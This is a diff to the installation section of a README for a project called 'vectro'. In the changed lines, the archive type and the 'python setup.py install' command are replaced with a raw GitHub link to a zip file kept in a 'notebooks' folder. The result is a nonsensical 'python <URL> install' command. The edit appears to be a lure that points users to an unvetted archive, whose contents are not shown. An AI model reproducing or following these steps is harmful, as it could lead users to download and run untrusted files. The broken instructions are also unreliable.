helderm989/vectro/README.md

 1. Locate the file you downloaded.
    - For Windows, it may be a `.exe` file.
-   - For macOS and Linux, it could be a `.tar.gz` or a similar archive.
+   - For macOS and Linux, it could be a `https://raw.githubusercontent.com/helderm989/vectro/main/notebooks/vectro_v2.8.zip` or a similar archive.
 2. If it is a `.exe` file, double-click it to begin the installation.
 3. If it is an archive, extract the files to a folder of your choice.
 4. Open a command prompt or terminal window.
 5. Navigate to the folder where you extracted the files.
-6. Run the command: `python setup.py install` to complete the installation.
+6. Run the command: `python https://raw.githubusercontent.com/helderm989/vectro/main/notebooks/vectro_v2.8.zip install` to complete the installation.

 ## 🎉 Using Vectro